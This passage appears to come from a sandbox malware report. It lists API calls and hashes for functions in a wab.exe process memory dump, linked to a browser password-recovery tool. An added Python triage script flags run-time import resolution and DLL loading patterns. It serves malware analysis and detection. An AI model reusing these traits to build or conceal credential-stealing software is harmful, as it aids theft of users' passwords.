                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 764393265-0
                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                              • String ID:
                                                                                              • API String ID: 979780441-0
                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memcpy.MSVCRT ref: 004134E0
                                                                                              • memcpy.MSVCRT ref: 004134F2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                              • String ID:
                                                                                              • API String ID: 1386444988-0
                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateMessageRectSend
                                                                                              • String ID: d=E
                                                                                              • API String ID: 909852535-3703654223
                                                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr$memcpywcslen
                                                                                              • String ID: "
                                                                                              • API String ID: 1983396471-123907689
                                                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                              • memcpy.MSVCRT ref: 0040C024
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                              • String ID: URL
                                                                                              • API String ID: 2108176848-3574463123
                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemcpy
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 2789212964-323797159
                                                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf
                                                                                              • String ID: %%-%d.%ds
                                                                                              • API String ID: 3988819677-2008345750
                                                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: F^@
                                                                                              • API String ID: 568519121-3652327722
                                                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PlacementWindowmemset
                                                                                              • String ID: WinPos
                                                                                              • API String ID: 4036792311-2823255486
                                                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 383090722-1948609170
                                                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                              • API String ID: 2773794195-880857682
                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
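The two entries above describe how this code finds its helper DLL and its language file. The first derives a path from GetModuleFileNameW, wcsrchr and wcscat with the string _lng.ini (the "<tool>_lng.ini" naming NirSoft utilities use for their translation files, which fits the WebBrowserPassView detection in the signatures). The second builds the shell32.dll path on top of GetSystemDirectoryW before LoadLibraryW, so the DLL is loaded from an explicit System32 path rather than by bare name, and then resolves SHGetSpecialFolderPathW through GetProcAddress, so that import never shows up in the PE import table. Reading such patterns out of a long plugin listing by eye is slow. The script below is an added example, not code from Joe Sandbox or from the analysed sample: it parses the "APIs" bullets and "String ID" lines of this listing format and flags the three patterns. The sample text is the two entries above with their leading whitespace trimmed; the heuristic names (dynamic_imports, system_dir_loads, module_relative_paths, triage) are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: the "APIs" bullets and "String ID" lines of the two entries
# above, copied from the report with leading whitespace trimmed. The hash and
# dump-source lines of an entry carry nothing the triage needs and are skipped.
SAMPLE = """\
APIs
• Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
• String ID: _lng.ini
APIs
• Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
• Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
• Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
• Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
• String ID: SHGetSpecialFolderPathW$shell32.dll
"""

# "• [Part of subcall function <addr>: ]<api>.<module>[(<args>)], ref: <addr>"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<mod>[A-Za-z0-9]+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")
HEX = re.compile(r"^[0-9A-Fa-f]+$")


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[str]
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee whose body made the call, when the plugin says so


@dataclass
class Entry:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)   # "String ID" values, split on "$"


def parse_entries(text: str) -> List[Entry]:
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every function entry opens with this header
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiRef(m.group("api"), m.group("mod"), args,
                                   m.group("ref"), m.group("sub")))
            continue
        m = STRING_ID.match(line)
        if m:
            cur.strings.extend(s for s in m.group("ids").split("$") if s)
    return entries


def dynamic_imports(entry: Entry) -> List[Tuple[str, str]]:
    """GetProcAddress calls whose argument list carries a symbolic name: the
    function is resolved at run time and is absent from the PE import table."""
    found = []
    for r in entry.apis:
        if r.api == "GetProcAddress":
            found.extend((r.ref, a) for a in r.args if a != "?" and not HEX.match(a))
    return found


def system_dir_loads(entry: Entry) -> List[str]:
    """Subcalls that pair GetSystemDirectoryW with LoadLibrary: the DLL is loaded
    from an explicit System32 path instead of by bare name."""
    by_sub: Dict[str, Set[str]] = {}
    for r in entry.apis:
        if r.subcall:
            by_sub.setdefault(r.subcall, set()).add(r.api)
    return sorted(s for s, apis in by_sub.items()
                  if "GetSystemDirectoryW" in apis and apis & {"LoadLibraryW", "LoadLibraryA"})


def module_relative_paths(entry: Entry) -> List[str]:
    """Entries that take GetModuleFileName and append to it: the entry's strings
    are the suffixes joined to the running image's own path."""
    apis = {r.api for r in entry.apis}
    if apis & {"GetModuleFileNameW", "GetModuleFileNameA"} and apis & {"wcscat", "_mbscat"}:
        return list(entry.strings)
    return []


def triage(text: str) -> List[str]:
    findings = []
    for i, e in enumerate(parse_entries(text)):
        findings += [f"entry {i}: import resolved by name at {ref}: {name}"
                     for ref, name in dynamic_imports(e)]
        findings += [f"entry {i}: DLL loaded from the system directory in subcall {s}"
                     for s in system_dir_loads(e)]
        findings += [f"entry {i}: path built from own module path with suffix {s!r}"
                     for s in module_relative_paths(e)]
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

The same parser runs over a whole listing pasted from a report; only the "APIs" headers and the bullet lines matter, the hash and dump-source lines fall through unmatched.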

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                              • memcmp.MSVCRT ref: 00408B2B
                                                                                              • memcmp.MSVCRT ref: 00408B5C
                                                                                              • memcpy.MSVCRT ref: 00408B79
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 231171946-0
                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1961120804-0
                                                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 20.8%
Signature Coverage: 0.5%
Total number of Nodes: 831
Total number of Limit Nodes: 16

The interactive execution graph is exported on this page as a flat token stream ("<node id> <address> <API names>" entries and "<id>-><id>" edges) that is unreadable inline and is cut off after node 40f69e RegQueryValueExA. Every node belongs to the image mapped at 0x400000 in process 12 (wab.exe, snapshot hcaresult_12_2_400000_wab.jbxd). The call chains recoverable from the exported nodes and edges are summarised below; functions the sandbox collapsed are given with their "N API calls" count, and ??2@YAPAXI / ??3@YAXPAX are the mangled operator new / operator delete.

Entry and main window
• 444c4a (CRT start-up): GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __getmainargs, _initterm, GetStartupInfoA, GetModuleHandleA, then 40cf44, then exit or _cexit.
